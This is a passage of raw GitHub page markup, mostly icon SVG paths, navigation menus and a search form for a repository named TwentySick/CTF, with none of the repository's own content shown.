1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="475531499" data-scoped-search-url="/TwentySick/CTF/search" data-owner-scoped-search-url="/users/TwentySick/search" data-unscoped-search-url="/search" data-turbo="false" action="/TwentySick/CTF/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="DoDcg4tCulSo9WgBnD1X9cwwaDLVpy5O9Fc8l2/ie7FqWNYnhg/72C1xRRf8266XNk8jVU78xI7jgHyE54Upng==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 